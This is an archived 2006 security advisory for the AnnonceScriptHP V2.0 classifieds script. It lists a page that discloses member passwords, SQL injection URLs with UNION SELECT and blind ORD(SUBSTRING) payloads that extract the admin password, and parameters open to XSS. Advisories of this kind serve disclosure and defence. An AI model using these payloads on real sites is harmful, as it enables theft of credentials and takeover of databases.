Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15356
HistoryDec 10, 2006 - 12:00 a.m.

AnnonceScriptHP V2.0 Multiple Vulnerabilities

2006-12-1000:00:00
vulners.com
19
JSON

AnnonceScriptHP V2.0

Vendor site: http://www.scripthp.com/
Product: AnnonceScriptHP V2.0
Vulnerability: XSS & SQL Injection Vulnerability
Credits: Mr_KaLiMaN
Reported to Vendor: 02/12/06
Public disclosure: 09/12/06

Description:

Password disclosure (all members):
http://[victim]/[script_annonce_path]/admin/admin_membre/fiche_membre.php?idmembre=1 (1 for admin
etc…)

SQL Injection Vulnerability:
http://[victim]/[script_annonce_path]/email.php?id=[SQL INJECTION]
http://[victim]/[script_annonce_path]/email.php?id=-1 UNION SELECT null,passe,pseudo FROM an_membre
WHERE idmembre=1#

http://[victim]/[script_annonce_path]/voirannonce.php?no=[SQL INJECTION]
http://[victim]/[script_annonce_path]/voirannonce.php?no=1 AND ORD(SUBSTRING((SELECT passe FROM
an_membre WHERE idmembre=1),1,1))=98#

http://[victim]/[script_annonce_path]/admin/admin_membre/fiche_membre.php?idmembre=[SQL INJECTION]
http://[victim]/[script_annonce_path]/admin/admin_membre/fiche_membre.php?idmembre=-1 UNION SELECT
null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM etc…#

http://[victim]/[script_annonce_path]/admin/admin_annonce/okvalannonce.php?idannonce=[SQL INJECTION]
http://[victim]/[script_annonce_path]/admin/admin_annonce/okvalannonce.php?idannonce=1%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null#

http://[victim]/[script_annonce_path]/admin/admin_annonce/changeannonce.php?idannonce=[SQL INJECTION]
http://[victim]/[script_annonce_path]/admin/admin_annonce/changeannonce.php?idannonce=1 AND
ORD(SUBSTRING((SELECT passe FROM an_membre WHERE idmembre=1),1,1))=98#

XSS :
http://[victim]/[script_annonce_path]/erreurinscription.php?email=[XSS]
http://[victim]/[script_annonce_path]/Templates/admin.dwt.php?email=[XSS]
http://[victim]/[script_annonce_path]/Templates/commun.dwt.php?email=[XSS]
http://[victim]/[script_annonce_path]/Templates/membre.dwt.php?email=[XSS]
http://[victim]/[script_annonce_path]/admin/admin_config/Aide.php?email=[XSS]

JSON